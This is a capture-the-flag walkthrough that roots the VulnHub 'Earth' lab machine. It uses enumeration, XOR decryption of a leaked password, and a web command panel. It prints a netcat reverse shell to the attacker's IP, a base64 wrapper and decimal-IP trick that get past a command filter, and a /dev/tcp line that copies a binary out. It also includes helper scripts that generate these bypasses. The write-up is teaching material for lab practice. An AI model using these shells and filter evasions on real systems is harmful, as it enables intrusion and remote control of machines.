CTF · Vulnhub

The Planets: Earth

Description:-

Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware.

Set up the VulnHub machine: –

  1. Download the OVA image from VulnHub (https://download.vulnhub.com/theplanets/Earth.ova).
  2. Open VirtualBox, choose Import Appliance and select the downloaded file.
  3. After the import, set the VM's network adapter to a Host-only adapter so it lands on the same 192.168.56.0/24 network as the attacking machine; this is what lets you find it in the enumeration phase.

The Walkthrough: – 

Step 1:- (Enumeration) 

Find the target's IP address with netdiscover:

┌──(rootharsh㉿kali)-[~]
└─$ sudo netdiscover -i eth0

From the Scanning result, we have discovered our target IP address i.e., 192.168.56.105. 

With the target located, the next step is a port scan: knowing which ports are open is an essential part of enumeration, because it shows the attack surface and lets us plan targeted attacks. As usual, we use Nmap with these options:

  • -sC: perform a script scan using the default set of scripts, 
  • -sV: enables version detection, which will detect what versions are running on what port.
  • -v: Increase the verbosity level (use -vv or more for greater effect), 
  • -T4: Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network. 
┌──(rootharsh㉿kali)-[~]
└─$ nmap -sC -sV -v -T4 192.168.56.105
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 11:56 IST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating Ping Scan at 11:56
Scanning 192.168.56.105 [2 ports]
Completed Ping Scan at 11:56, 0.00s elapsed (1 total hosts)
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Initiating Connect Scan at 11:56
Scanning 192.168.56.105 [1000 ports]
Discovered open port 22/tcp on 192.168.56.105
Discovered open port 80/tcp on 192.168.56.105
Discovered open port 443/tcp on 192.168.56.105
Completed Connect Scan at 11:56, 6.13s elapsed (1000 total ports)
Initiating Service scan at 11:56
Scanning 3 services on 192.168.56.105
Completed Service scan at 11:56, 12.06s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.56.105.
Initiating NSE at 11:56
Completed NSE at 11:56, 1.26s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 1.26s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Nmap scan report for 192.168.56.105
Host is up (0.0015s latency).
Not shown: 985 filtered tcp ports (no-response), 12 filtered tcp ports (host-unreach)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_  256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Issuer: commonName=earth.local/stateOrProvinceName=Space
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-12T23:26:31
| Not valid after:  2031-10-10T23:26:31
| MD5:   4efa65d21a9e07184b5441da3712f187
|_SHA-1: 04db5b29a33f8076f16b8a1b581d6988db257651
|_http-title: Test Page for the HTTP Server on Fedora
| http-methods: 
|   Supported Methods: POST OPTIONS HEAD GET TRACE
|_  Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9

NSE: Script Post-scanning.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.08 seconds

From the Nmap output we have found three open ports:

Port 22 (OpenSSH 8.6 (protocol 2.0))

Port 80 (Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9))

and Port 443 (Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)).

The TLS certificate on port 443 gives us two hostnames:

443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Issuer: commonName=earth.local/stateOrProvinceName=Space

Add both hostnames to /etc/hosts so the browser sends a Host header the server recognises (the 400 Bad Request title nmap saw on port 80 suggests the site is served by name). Append this line:

192.168.56.105 earth.local terratest.earth.local

┌──(rootharsh㉿kali)-[~]
└─$ sudo nano /etc/hosts
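Pulling virtual hostnames out of a certificate and turning them into a hosts entry is a routine step worth scripting. The following is an added example, not code from the original walkthrough: it parses the ssl-cert lines exactly as nmap printed them above (copied here as a constant), collects the subject CN and the DNS SANs, drops wildcard names (which /etc/hosts cannot express), and emits the hosts line. The target IP is passed in by hand because the certificate does not carry it.

```python
"""Added example (not from the original walkthrough): derive the /etc/hosts
entry from the hostnames nmap read out of the TLS certificate."""
import re

# The ssl-cert lines from the page's nmap output, used as sample input.
NMAP_SSL_CERT = """\
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Issuer: commonName=earth.local/stateOrProvinceName=Space
"""


def cert_hostnames(nmap_text):
    """Return the subject CN and every DNS SAN, deduplicated, in order of
    first appearance. Wildcard names are dropped because a hosts file
    cannot map them; the Issuer line is ignored on purpose."""
    names = []
    for line in nmap_text.splitlines():
        line = line.lstrip("| ")            # strip nmap's script-output margin
        if line.startswith("Subject:"):
            m = re.search(r"commonName=([^/\s]+)", line)
            if m:
                names.append(m.group(1))
        elif line.startswith("Subject Alternative Name:"):
            names.extend(re.findall(r"DNS:([^,\s]+)", line))
    unique = []
    for name in names:
        if name.startswith("*.") or name in unique:
            continue
        unique.append(name)
    return unique


def hosts_entry(ip, names):
    """One /etc/hosts line mapping every discovered name to the target IP."""
    return f"{ip} {' '.join(names)}"


if __name__ == "__main__":
    names = cert_hostnames(NMAP_SSL_CERT)
    print(hosts_entry("192.168.56.105", names))
```

Running it prints the line shown above; in a real engagement, feed it the `ssl-cert` output from any host and review the list before appending, because a SAN list can be long and include names that resolve elsewhere.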

Open Browser, and then visit the following Link:

http://earth.local/

If you scroll down, there are a few encrypted messages, each listed with a message key:

Next, look for hidden or unlinked directories and pages by directory busting. Using gobuster as our tool of choice, these switches give fast and accurate results:

  • dir : Uses directory/file enumeration mode. 
  • -u : The target URL. 
  • -w : Path to the wordlist.
┌──(rootharsh㉿kali)-[~]
└─$ gobuster dir -u http://earth.local/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://earth.local/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/03/16 14:39:40 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 0] [--> /admin/]
/cgi-bin/             (Status: 403) [Size: 199]
Progress: 4434 / 4615 (96.08%)
===============================================================
2023/03/16 14:39:47 Finished
===============================================================

An admin page is exactly the kind of find that, combined with a set of credentials, gives us leverage on the target.

If you click on Login then it will redirect to a Login Page:

Now we don’t have any credentials to get login access, so we have to find out the credentials.

After some digging, the second hostname from the certificate turns out to be a test site that may hold a clue:

Open Browser and Visit this site:

  • Remember: Access this site with SSL (HTTPS)

https://terratest.earth.local/

Run gobuster again to enumerate directories on this host (-k skips certificate verification, needed because the certificate is self-signed):

┌──(rootharsh㉿kali)-[~]
└─$ gobuster dir -u https://terratest.earth.local/ -k -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://terratest.earth.local/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/03/18 12:48:04 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 199]
/.htaccess            (Status: 403) [Size: 199]
/.htpasswd            (Status: 403) [Size: 199]
/cgi-bin/             (Status: 403) [Size: 199]
/index.html           (Status: 200) [Size: 26]
/robots.txt           (Status: 200) [Size: 521]
Progress: 4563 / 4615 (98.87%)
===============================================================
2023/03/18 12:48:38 Finished
===============================================================

Directory busting turns up an interesting file, robots.txt.

It in turn points at another interesting file, /testingnotes.* (the extension is not given, so try .txt first):

https://terratest.earth.local/testingnotes.txt

It is a note left by a developer or admin.

From the note we can confirm that the encryption used for the messages is XOR and that the key is the text of testdata.txt. It also tells us the username for the admin portal is terra, and that the admin portal is at /admin on the other site.

https://terratest.earth.local/testdata.txt

This looks like the key used to encrypt the messages on the earth.local page. Let's decrypt them with CyberChef:

(Learn more: https://github.com/gchq/CyberChef)

Visit Cyberchef:-

The messages are hex-encoded XOR ciphertext, so the recipe is From Hex followed by XOR.

Drag and drop the From Hex and XOR Operations to Recipe:

Input the decrypt Message one by one and also paste the key that we have found from “testdata.txt“.

  • Remember: The Key is set to UTF-8.

It seems that we get earthclimatechangebad4humans as a repeating string. It may be the password of the user terra.
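The same decryption can be done without CyberChef. The block below is an added example, not part of the original walkthrough: it implements the From Hex plus XOR recipe in Python and finds the shortest repeating unit of the result, which is how the repeated password stands out. The page does not reproduce the text of testdata.txt or the hex messages, so the key and the ciphertext here are constructed: the ciphertext is the recovered password, repeated and XORed with a placeholder key, purely so the script has something to decrypt.

```python
"""Added example (not from the original walkthrough): repeating-key XOR
decryption of hex-encoded messages, the operation the page runs in CyberChef
with the text of testdata.txt as the key."""
import binascii
from itertools import cycle

# Constructed placeholder standing in for testdata.txt, which is not
# reproduced on this page. Any text works; the real key is the file contents.
SAMPLE_KEY = b"Placeholder key text standing in for testdata.txt on terratest.earth.local."


def xor_with_key(data, key):
    """XOR data against key, cycling the key as needed. XOR is its own
    inverse, so the same call encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def decrypt_hex_message(hex_msg, key_text):
    """From Hex, then XOR with the key text encoded as UTF-8 (the CyberChef
    recipe described on the page)."""
    return xor_with_key(binascii.unhexlify(hex_msg.strip()), key_text.encode("utf-8"))


def smallest_period(data):
    """Length of the shortest prefix whose repetition reproduces data; the
    repeating string CyberChef shows is data[:smallest_period(data)]."""
    n = len(data)
    for p in range(1, n + 1):
        if all(data[i] == data[i % p] for i in range(n)):
            return p
    return n


def is_printable_ascii(data):
    """A quick plausibility check: a wrong message or key yields binary junk."""
    return all(32 <= b < 127 for b in data)


# Constructed ciphertext: the password the walkthrough recovers, repeated and
# XORed with SAMPLE_KEY, hex-encoded the way messages appear on the page.
PASSWORD = b"earthclimatechangebad4humans"
SAMPLE_CIPHERTEXT_HEX = binascii.hexlify(xor_with_key(PASSWORD * 3, SAMPLE_KEY)).decode()


if __name__ == "__main__":
    plain = decrypt_hex_message(SAMPLE_CIPHERTEXT_HEX, SAMPLE_KEY.decode())
    period = smallest_period(plain)
    print("printable:", is_printable_ascii(plain))
    print("plaintext:", plain.decode())
    print("repeating unit:", plain[:period].decode())
```

With the real inputs, paste each hex message from earth.local and the contents of testdata.txt; the message that decrypts to printable text with a short period is the one that leaks the password.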

Step 2:- (Foothold)

Let's log in to the admin panel we found earlier as terra with that password.

After logging in we get a web-based command line interface. Try a simple command first:

The assumption holds and we get command output. Next, try to turn this into a reverse shell:

nc -e /bin/sh 192.168.56.102 4444

The web shell rejects this with a warning, so the simplest form is blocked.

Two bypasses work: write the IP address in decimal notation, or base64-encode the whole command so the filtered string never appears in the request.

Open terminal and input below command:

┌──(rootharsh㉿kali)-[~]
└─$ echo 'nc -e /bin/sh 192.168.56.102 4444' | base64
bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjU2LjEwMiA0NDQ0Cg==

Start a netcat listener first, then paste this string into the browser wrapped in a base64-decode command.

┌──(rootharsh㉿kali)-[~]
└─$ nc -lvnp 4444

listening on [any] 4444 ...

Now copy the below command and paste to CLI Command Line interface:

echo '{Decoded script}' | base64 -d | bash
echo 'bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjU2LjEwMiA0NDQ0Cg==' | base64 -d | bash
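Both bypasses the page mentions are easy to generate and worth understanding as a filter-evasion pattern. The block below is an added example, not code from the original walkthrough: it builds the exact `echo ... | base64 -d | bash` wrapper shown above (reproducing the trailing newline that `echo` adds), converts the IP address to the decimal form most `inet_aton` implementations accept, and checks both against a constructed substring denylist. The real filter on the box is not shown on the page, so the denylist is an assumption used only to illustrate why substring matching fails.

```python
"""Added example (not from the original walkthrough): generate the two
command-filter bypasses the page describes and show why a substring
denylist misses them."""
import base64

# Constructed denylist standing in for the web shell's unknown filter.
DENYLIST = ("192.168.", "/bin/sh", "nc ")


def wrap_base64(command):
    """Return the echo | base64 -d | bash wrapper for command. The newline is
    appended so the output matches `echo '<command>' | base64` on the page."""
    encoded = base64.b64encode((command + "\n").encode()).decode()
    return f"echo '{encoded}' | base64 -d | bash"


def ip_to_decimal(ip):
    """Dotted-quad to the single integer form (e.g. 192.168.56.102 -> 3232249958)
    that resolvers using inet_aton accept in place of the dotted form."""
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"not an IPv4 address: {ip}")
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]


def naive_filter_blocks(command):
    """True if a substring denylist would reject the command."""
    return any(bad in command for bad in DENYLIST)


if __name__ == "__main__":
    raw = "nc -e /bin/sh 192.168.56.102 4444"
    wrapped = wrap_base64(raw)
    decimal = f"nc -e /bin/sh {ip_to_decimal('192.168.56.102')} 4444"
    print(wrapped)
    print(decimal)
    for label, cmd in (("raw", raw), ("base64", wrapped), ("decimal ip", decimal)):
        print(f"{label:10s} blocked by substring filter: {naive_filter_blocks(cmd)}")
```

Note that the decimal-IP variant still contains `nc ` and `/bin/sh`, so it only defeats a filter that matches the address; the base64 wrapper hides everything except `echo`, `base64` and `bash`, which is why a denylist on the command string is not a real control for a web shell.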

The listener receives a connection from the target; upgrade the raw shell to a pty with python:

┌──(rootharsh㉿kali)-[~]
└─$ nc -lvnp 4444

listening on [any] 4444 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.105] 42698
python -c 'import pty;pty.spawn("/bin/bash")'
bash-5.1$ whoami
whoami
apache
bash-5.1$

We have a foothold on The Planets: Earth as the apache user, but no administrator privileges.

Step 3:- (Privilege Escalation)

Let’s check our SUIDs and see if there’s anyway we can escalate to root.

bash-5.1$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1

reset_root is not a standard binary and its name suggests it may hand us root. Check what it is:

bash-5.1$ file /usr/bin/reset_root
file /usr/bin/reset_root
/usr/bin/reset_root: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=4851fddf6958d92a893f3d8042d04270d8d31c23, for GNU/Linux 3.2.0, not stripped
bash-5.1$ 

Running it only prints RESET FAILED.

To find out why, copy the binary to the attacking machine over a raw TCP connection using bash's /dev/tcp:

bash-5.1$ cat /usr/bin/reset_root > /dev/tcp/192.168.56.102/3333     
cat /usr/bin/reset_root > /dev/tcp/192.168.56.102/3333     
bash-5.1$ 

Before executing the upper command you have to open a new terminal and start another listener.

┌──(rootharsh㉿kali)-[~]
└─$ nc -lvnp 3333 > reset_root
listening on [any] 3333 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.105] 39780

The binary is now on the attacking machine. Make it executable and trace its library calls with ltrace:

┌──(rootharsh㉿kali)-[~]
└─$ chmod +x reset_root
┌──(rootharsh㉿kali)-[~]
└─$ ltrace ./reset_root
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
)                   = 38
access("/dev/shm/kHgTFI5G", 0)                                = -1
access("/dev/shm/Zw7bV9U5", 0)                                = -1
access("/tmp/kcM0Wewe", 0)                                    = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
)                   = 44
+++ exited (status 0) +++

The trace shows the binary calls access() on three files and gives up because none of them exists. All three live in /dev/shm and /tmp, which are world-writable, so any local user can create them. Create them on the target and run the binary again; it then resets the root password.
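Reading trigger paths out of a trace and checking whether an unprivileged user controls them is the generic version of this step. The block below is an added example, not code from the original walkthrough: it takes the ltrace lines printed above (embedded as a constant), extracts every path whose access() call returned -1, checks whether the parent directory is world-writable (mode 1777 as on /tmp and /dev/shm), and prints the touch commands used next. The parent-directory check uses the local filesystem, so run it on the target or on any Linux host to see the point it makes.

```python
"""Added example (not from the original walkthrough): find the trigger files a
setuid binary probes with access() and show why they are attacker-controlled."""
import os
import re
import stat

# The ltrace output from the page's run of reset_root, used as sample input.
LTRACE_OUTPUT = """\
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
)                   = 38
access("/dev/shm/kHgTFI5G", 0)                                = -1
access("/dev/shm/Zw7bV9U5", 0)                                = -1
access("/tmp/kcM0Wewe", 0)                                    = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
)                   = 44
+++ exited (status 0) +++
"""

# access("<path>", <mode>) = <rc> as ltrace prints it.
ACCESS_RE = re.compile(r'^access\("([^"]+)",\s*\d+\)\s*=\s*(-?\d+)')


def missing_triggers(ltrace_text):
    """Paths the binary probed with access() that do not exist (rc == -1)."""
    paths = []
    for line in ltrace_text.splitlines():
        m = ACCESS_RE.match(line)
        if m and int(m.group(2)) == -1:
            paths.append(m.group(1))
    return paths


def is_world_writable(mode):
    """True when a directory mode lets any local user create entries in it,
    e.g. 0o41777 for /tmp and /dev/shm. Regular files never qualify here."""
    return stat.S_ISDIR(mode) and bool(mode & stat.S_IWOTH)


def attacker_can_create(path):
    """Can an unprivileged local user create `path`? Decided from the parent
    directory's mode; a missing parent counts as not creatable."""
    try:
        return is_world_writable(os.stat(os.path.dirname(path)).st_mode)
    except FileNotFoundError:
        return False


def touch_commands(paths):
    """Shell lines that create the missing trigger files, as done by hand below."""
    return ["touch " + p for p in paths]


if __name__ == "__main__":
    missing = missing_triggers(LTRACE_OUTPUT)
    for p in missing:
        print(f"{p}: parent world-writable = {attacker_can_create(p)}")
    print("\n".join(touch_commands(missing)))
```

The lesson for the defender is the same one the trace makes obvious: a privileged program must never take a go/no-go decision from files in a directory the unprivileged user can write to.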

bash-5.1$ touch /dev/shm/kHgTFI5G
touch /dev/shm/kHgTFI5G
bash-5.1$ touch /dev/shm/Zw7bV9U5
touch /dev/shm/Zw7bV9U5
bash-5.1$ touch /tmp/kcM0Wewe
touch /tmp/kcM0Wewe
bash-5.1$

Let’s execute the reset_root file again:

bash-5.1$ reset_root
reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
bash-5.1$

The reset succeeded and the root password is now Earth. Switch to root and collect the flag:

bash-5.1$ su root
su root
Password: Earth

[root@earth /]# cd /root
cd /root
[root@earth ~]# ls
ls
anaconda-ks.cfg  root_flag.txt
[root@earth ~]# cat root_flag.txt
cat root_flag.txt

              _-o#&&*''''?d:>b\_
          _o/"`''  '',, dMF9MMMMMHo_
       .o&#'        `"MbHMMMMMMMMMMMHo.
     .o"" '         vodM*$&&HMMMMMMMMMM?.
    ,'              $M&ood,~'`(&##MMMMMMH\
   /               ,MMMMMMM#b?#bobMMMMHMMML
  &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
 ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    '
 :|MMMMMM-                 `MMMMMMMT .M|.   :
  .9MMM[                    &MMMMM*' `'    .
   :9MMk                    `MMM#"        -
     &M}                     `          .-
      `&.                             .
        `~,   .                     ./
            . _                  .-
              '`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
[root@earth ~]# 

Congratulations! We have successfully rooted the VulnHub machine.
